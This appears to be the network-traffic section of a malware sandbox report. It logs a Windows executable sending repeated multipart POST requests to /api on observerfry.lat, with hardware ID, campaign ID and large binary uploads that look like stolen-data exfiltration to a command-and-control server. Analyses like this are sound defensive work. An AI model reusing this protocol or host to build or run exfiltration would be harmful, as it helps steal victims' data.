                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=YQQFKK6DE2Y0H6
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 18139
                                                                                                            Host: observerfry.lat
                                                                                                            2024-12-24 07:35:38 UTC15331OUTData Raw: 2d 2d 59 51 51 46 4b 4b 36 44 45 32 59 30 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 36 30 30 42 36 39 34 33 31 46 44 31 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 59 51 51 46 4b 4b 36 44 45 32 59 30 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 51 51 46 4b 4b 36 44 45 32 59 30 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 51 51 46 4b 4b 36 44
                                                                                                            Data Ascii: --YQQFKK6DE2Y0H6Content-Disposition: form-data; name="hwid"9A9600B69431FD17BEBA0C6A975F1733--YQQFKK6DE2Y0H6Content-Disposition: form-data; name="pid"2--YQQFKK6DE2Y0H6Content-Disposition: form-data; name="lid"PsFKDg--pablo--YQQFKK6D
                                                                                                            2024-12-24 07:35:38 UTC2808OUTData Raw: e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11
                                                                                                            Data Ascii: (u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                                            2024-12-24 07:35:38 UTC1126INHTTP/1.1 200 OK
                                                                                                            Date: Tue, 24 Dec 2024 07:35:38 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=3h1ltlthjq14qh16c24g2dcb3n; expires=Sat, 19 Apr 2025 01:22:17 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qqqJpoCNy1BXboGARb4Z0GVXdQkEIpoC1lVkhFpozft%2BttzJ9LFhUUBCi0OIlGWfRsHzOs9RgLNlawVEz%2FhS6DFGtCNoWHQ8fpE0ijj1rlRAMiJJOmovQhMflThPZdu36CE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6eea6fdde50f3f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1453&min_rtt=1446&rtt_var=556&sent=15&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=19096&delivery_rate=1944074&cwnd=193&unsent_bytes=0&cid=020ef3388502d708&ts=1201&x=0"
                                                                                                            2024-12-24 07:35:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-24 07:35:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.449733172.67.199.724437412C:\Users\user\Desktop\yO9EAqDV15.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-24 07:35:40 UTC279OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=KC6ECR53FPBPHPG89
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 8778
                                                                                                            Host: observerfry.lat
                                                                                                            2024-12-24 07:35:40 UTC8778OUTData Raw: 2d 2d 4b 43 36 45 43 52 35 33 46 50 42 50 48 50 47 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 36 30 30 42 36 39 34 33 31 46 44 31 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 43 36 45 43 52 35 33 46 50 42 50 48 50 47 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 43 36 45 43 52 35 33 46 50 42 50 48 50 47 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                            Data Ascii: --KC6ECR53FPBPHPG89Content-Disposition: form-data; name="hwid"9A9600B69431FD17BEBA0C6A975F1733--KC6ECR53FPBPHPG89Content-Disposition: form-data; name="pid"2--KC6ECR53FPBPHPG89Content-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                            2024-12-24 07:35:41 UTC1127INHTTP/1.1 200 OK
                                                                                                            Date: Tue, 24 Dec 2024 07:35:40 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=kij3lnbubkfubhg0n93q009f90; expires=Sat, 19 Apr 2025 01:22:19 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CCpKk2Yg6VpEpKLOqW9GO4zk4sbH%2FRATScMZwKR%2BP5NYWQiXnGxu8z0VYE1DKXCVvmS0wFHkA03ho6I%2FVP8pCku1zg%2FTWoVknaWlQZ2ICFzddXUh6l50qlSVKJiq66H6WG4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6eea7e1dab8c90-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1772&rtt_var=681&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9715&delivery_rate=1586956&cwnd=201&unsent_bytes=0&cid=dd338d2c02842005&ts=783&x=0"
                                                                                                            2024-12-24 07:35:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-24 07:35:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.449734172.67.199.724437412C:\Users\user\Desktop\yO9EAqDV15.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-24 07:35:42 UTC271OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=SGHG9EE2
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 20377
                                                                                                            Host: observerfry.lat
                                                                                                            2024-12-24 07:35:42 UTC15331OUTData Raw: 2d 2d 53 47 48 47 39 45 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 36 30 30 42 36 39 34 33 31 46 44 31 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 53 47 48 47 39 45 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 47 48 47 39 45 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 53 47 48 47 39 45 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                            Data Ascii: --SGHG9EE2Content-Disposition: form-data; name="hwid"9A9600B69431FD17BEBA0C6A975F1733--SGHG9EE2Content-Disposition: form-data; name="pid"3--SGHG9EE2Content-Disposition: form-data; name="lid"PsFKDg--pablo--SGHG9EE2Content-Disposit
                                                                                                            2024-12-24 07:35:42 UTC5046OUTData Raw: 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00
                                                                                                            Data Ascii: QMn 64F6(X&7~`aO@dR<x)
                                                                                                            2024-12-24 07:35:43 UTC1127INHTTP/1.1 200 OK
                                                                                                            Date: Tue, 24 Dec 2024 07:35:43 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=3d1rkaa5cl4f8h5k99vfqh87gb; expires=Sat, 19 Apr 2025 01:22:22 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmkyA0lVSx93%2FnSIE3FnbLYJQCPBQNeyoFahPBoIdnLcUb2nYXY1jtN%2B1Sug6vngaaQBgszD0%2FMlqehkKnFMfZtO2tFAhgBqj2qMR3Aepeq4bVqDmrBhMC5NIodHZpNJtVc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6eea8bfa8142e2-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1735&rtt_var=658&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21328&delivery_rate=1655328&cwnd=187&unsent_bytes=0&cid=13fb1fdb0fb7fd77&ts=960&x=0"
                                                                                                            2024-12-24 07:35:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-24 07:35:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.449735172.67.199.724437412C:\Users\user\Desktop\yO9EAqDV15.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-24 07:35:45 UTC271OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=851Y5PCU9
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 1211
                                                                                                            Host: observerfry.lat
                                                                                                            2024-12-24 07:35:45 UTC1211OUTData Raw: 2d 2d 38 35 31 59 35 50 43 55 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 36 30 30 42 36 39 34 33 31 46 44 31 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 38 35 31 59 35 50 43 55 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 35 31 59 35 50 43 55 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 38 35 31 59 35 50 43 55 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                            Data Ascii: --851Y5PCU9Content-Disposition: form-data; name="hwid"9A9600B69431FD17BEBA0C6A975F1733--851Y5PCU9Content-Disposition: form-data; name="pid"1--851Y5PCU9Content-Disposition: form-data; name="lid"PsFKDg--pablo--851Y5PCU9Content-Disp
                                                                                                            2024-12-24 07:35:45 UTC1126INHTTP/1.1 200 OK
                                                                                                            Date: Tue, 24 Dec 2024 07:35:45 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=8joal0vvq70a0n496nvrolsjd0; expires=Sat, 19 Apr 2025 01:22:24 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FK0oSCXCvj%2FPpOcsSpRoUUXbQCe6inqyXwTyGdbpSi%2BAzoIRcxErP5kzMq%2Fn7eeqQMQZi9RejTLpRmYfFDA%2FhwE8bHAwpu58hpyKB1t8d70wwDEHWhUMXbhMXYPOWT21VM0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6eea9c5e09423d-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1727&rtt_var=665&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2118&delivery_rate=1623123&cwnd=186&unsent_bytes=0&cid=0bea81cda9721f35&ts=776&x=0"
                                                                                                            2024-12-24 07:35:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-24 07:35:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.449737172.67.199.724437412C:\Users\user\Desktop\yO9EAqDV15.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-24 07:35:47 UTC283OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=VIKTP4GUVP9FTTVZ8IE
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 571708
                                                                                                            Host: observerfry.lat
                                                                                                            2024-12-24 07:35:47 UTC15331OUTData Raw: 2d 2d 56 49 4b 54 50 34 47 55 56 50 39 46 54 54 56 5a 38 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 36 30 30 42 36 39 34 33 31 46 44 31 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 49 4b 54 50 34 47 55 56 50 39 46 54 54 56 5a 38 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 49 4b 54 50 34 47 55 56 50 39 46 54 54 56 5a 38 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                            Data Ascii: --VIKTP4GUVP9FTTVZ8IEContent-Disposition: form-data; name="hwid"9A9600B69431FD17BEBA0C6A975F1733--VIKTP4GUVP9FTTVZ8IEContent-Disposition: form-data; name="pid"1--VIKTP4GUVP9FTTVZ8IEContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                            2024-12-24 07:35:47 UTC15331OUTData Raw: f4 ba 03 2f 4a b0 18 15 7e aa 66 1f ab 92 ca 11 22 f6 75 6f 22 29 6a 6f a2 34 50 1d 81 32 1b e0 0c 6b 67 a6 e9 ef b2 63 0f eb f9 42 b7 6c 50 6f 4b 21 e6 cb 7f 40 07 5c 03 04 d7 99 f3 a7 ea cc 22 19 48 6c bf d4 36 ff ff 5f 8e ee 2e 01 2c b9 62 4c 4f c0 94 c7 8c dd 46 38 6e 3f d0 86 5a d4 67 75 6d 10 8a c4 5f d7 dd af c6 74 5a cc da 7e 13 df c3 e0 9c 12 12 97 01 1a e1 a1 ad 20 d3 77 ad b7 e4 2a a0 b7 3c b5 96 de 07 1b e8 f4 45 2a 31 6b 51 f8 7d bf 9c 94 d0 67 df 39 b5 28 f4 e4 cc a2 e7 a8 71 d0 c4 07 12 9d a3 b2 e0 ba 8b d1 f6 3d c1 6c 14 df e9 56 0c 7d 15 cf f1 72 14 05 be e3 19 17 dc 8e 68 1f 39 c4 e2 7f ed 65 04 ed ef f2 a2 cc ae 30 09 27 86 0b b9 7b c4 15 8b da ff 02 28 08 ab 09 8a 33 13 4e 38 a5 e1 72 74 a1 d7 0a 1f 4f 21 29 a5 2a 3c cc 58 ab 1d 0d 68
                                                                                                            Data Ascii: /J~f"uo")jo4P2kgcBlPoK!@\"Hl6_.,bLOF8n?Zgum_tZ~ w*<E*1kQ}g9(q=lV}rh9e0'{(3N8rtO!)*<Xh
                                                                                                            2024-12-24 07:35:47 UTC15331OUTData Raw: 2e 33 12 81 fd 51 01 f0 de 79 ad 62 fe e6 d5 4a cb 69 b1 86 20 66 21 5f 65 94 c7 26 83 cb 9f 71 47 28 97 bc 58 16 7f 44 fb 2e 1f ba 67 a6 38 18 3e 43 a0 27 50 f3 29 29 a2 56 db 33 8d 50 1e 90 55 d9 bc 9a ea 11 b3 49 9e 73 2d 0e 49 51 1b 5c b5 55 6e c7 0a f6 a2 5a bc c3 cc a3 dd 22 18 8a 53 1e d2 d0 38 17 af a8 67 d1 a2 80 30 e7 e1 88 41 d9 1f 05 84 3c aa 12 34 6e c8 26 77 1d 91 23 b7 7d fb d9 14 c0 f0 d9 b8 76 4a fb e2 53 8f e5 6f 8f e1 b2 28 37 d9 30 57 5d 7a ab a6 41 4d de 6c 78 9b 69 9a 20 8a fb b7 85 a9 50 88 0e 39 87 95 70 89 b7 bf 37 e8 f6 1c 07 dd 92 15 d8 de 36 77 ca 25 c3 08 e3 5b 93 06 21 21 43 77 e6 23 86 34 4c 93 dd f8 d6 e5 d4 c6 71 ae 8d 7a 14 ae fd 1d a1 0e 8f 6e 13 89 c7 7b 6e 1d 57 55 1b 37 2e 97 9b 17 2b 12 c8 ef 97 d5 46 62 bf 73 18 0b
                                                                                                            Data Ascii: .3QybJi f!_e&qG(XD.g8>C'P))V3PUIs-IQ\UnZ"S8g0A<4n&w#}vJSo(70W]zAMlxi P9p76w%[!!Cw#4Lqzn{nWU7.+Fbs
                                                                                                            2024-12-24 07:35:47 UTC15331OUTData Raw: 12 77 ff fb e6 cf cd 08 1e 29 6e a0 3b d9 66 16 d1 15 ec 3e 29 e4 60 9e d5 e8 e7 0a 92 b5 b6 e6 c2 4c 8c 1e 47 e6 79 24 b5 5d 1f f7 e6 5b 70 51 ed 9b 8a a8 32 ee 45 35 2c a9 89 ac 9f ed 75 cb ce 1c aa c7 17 95 f2 ad ca 80 a4 3f 8a 7e 68 07 d0 ec f6 51 06 d3 93 06 e9 24 1f 0f e2 de 6a bc 7a 1f 31 94 bd 56 d5 b3 33 eb 48 a5 3b 17 47 7a f2 6e 01 f7 67 fe 50 81 c6 cd 85 89 b3 ad 86 54 2f 9e 5d 26 52 31 2c 2d 7a 45 a7 d7 e3 88 7f 06 e3 fc 98 61 e5 bc 04 ad e6 95 e0 00 70 31 01 33 cb b6 6c 7b fd 11 e0 f0 cb ce 1f f2 8a 58 c5 bf 23 6c 50 c2 57 37 fe 24 7e d9 6a bb 5b 82 95 68 b3 d2 79 61 84 aa f2 da 5a 7d 91 99 de 8a e3 fb de e8 a5 0f 14 13 ff 53 d8 0a bd cf 79 52 e8 f7 70 f2 f6 9a cf 90 4b c1 8a b5 63 d0 a5 30 0b 3d 74 87 bc 26 55 0d a4 71 c7 75 96 7f 7a cc 99
                                                                                                            Data Ascii: w)n;f>)`LGy$][pQ2E5,u?~hQ$jz1V3H;GzngPT/]&R1,-zEap13l{X#lPW7$~j[hyaZ}SyRpKc0=t&Uquz
                                                                                                            2024-12-24 07:35:47 UTC15331OUTData Raw: 4d 97 08 75 15 36 a6 1a 2e d9 d5 f2 98 10 61 e5 73 cb 6e 9a 26 2d 0c 75 85 2c b3 88 7b bb 69 d9 79 85 19 a7 c9 ee 03 54 ee ed 92 0b 2f fe 42 6d 9c f1 64 77 b9 89 41 f2 43 e1 01 6c 79 37 c6 79 b7 cc 98 88 e0 56 12 cd f8 18 2c b5 fc 71 95 83 c7 f4 f1 b5 e8 68 b4 ad 1a fd 06 67 a6 52 26 d9 e3 52 ce 6c 21 53 d2 05 6e d1 f2 57 ed f7 df 3b b7 2e 45 ad 80 ac 74 b1 bc f9 9a 27 16 9a 19 b6 38 67 a7 ab a8 eb cf 90 cd 0d 65 29 f3 d4 7a 56 8b 0a 7c 30 b4 e7 35 c6 83 69 d0 29 4e 49 c7 e1 e3 71 ef c7 90 8f cc 8a fc 38 5c 63 e3 ed 2a ea 7d 13 43 7d 54 f6 2e 79 6a 21 87 37 99 29 2d 74 0e 2f 89 82 a5 a1 52 21 e7 f4 3f 4d 26 82 bb 7e 9e 25 48 3e 5d cf 8d 21 66 eb 46 ce 48 5e 3e 9c 1a 12 7d 57 61 54 02 05 f3 6c 9a 14 73 e6 d2 48 bb d6 3f 6a 71 9e 5e aa fb b1 f2 0d 95 58 15
                                                                                                            Data Ascii: Mu6.asn&-u,{iyT/BmdwACly7yV,qhgR&Rl!SnW;.Et'8ge)zV|05i)NIq8\c*}C}T.yj!7)-t/R!?M&~%H>]!fFH^>}WaTlsH?jq^X
                                                                                                            2024-12-24 07:35:47 UTC15331OUTData Raw: 39 8a fd 0f 5e e3 02 a2 dd 1d b8 2e 41 59 ad 0c 74 89 ab 52 7c fa 6c ee 2a e0 06 ca f0 a5 69 4f 32 3d 4d 8f 53 f5 b6 bd 05 9c 91 20 ee dc 67 80 90 55 a0 e8 bd 7f 77 a9 4c fd 67 07 1e ce ab 31 fa 97 11 c1 ee bf 97 70 f8 a9 3d c9 ad 26 06 d8 40 07 86 0b 2f 79 c9 73 08 f6 e3 9f 38 1e 03 31 a7 b6 ea 1f 15 83 e5 34 98 f6 48 6e 65 5a 85 3c 68 bd d9 2e 2d 88 97 e2 ed ce d3 58 10 6b 8f d9 5d fd 48 d0 68 42 36 e2 f8 2a 6a 93 ef bd 41 34 76 b7 b8 f0 9b 7b c9 6a c6 ad bc 25 3e 2e c3 03 9b 61 18 bf b4 9f b9 c5 ac 4e a1 e6 cf 33 4c f9 ff 5a b6 be a1 61 05 8a bb 53 4c bf 74 fe 15 b9 2a 37 51 44 d3 bb 5b 16 a5 d3 9b 7a 0b 1f c7 95 6d 46 72 35 6a 6e f0 16 e5 12 93 04 c8 a5 60 55 e5 2e b9 f3 bf 26 71 17 55 5c ed c5 bd b1 de 09 d8 d5 5d 98 3b 08 18 72 8a d3 a9 97 2c f4 5f
                                                                                                            Data Ascii: 9^.AYtR|l*iO2=MS gUwLg1p=&@/ys814HneZ<h.-Xk]HhB6*jA4v{j%>.aN3LZaSLt*7QD[zmFr5jn`U.&qU\];r,_
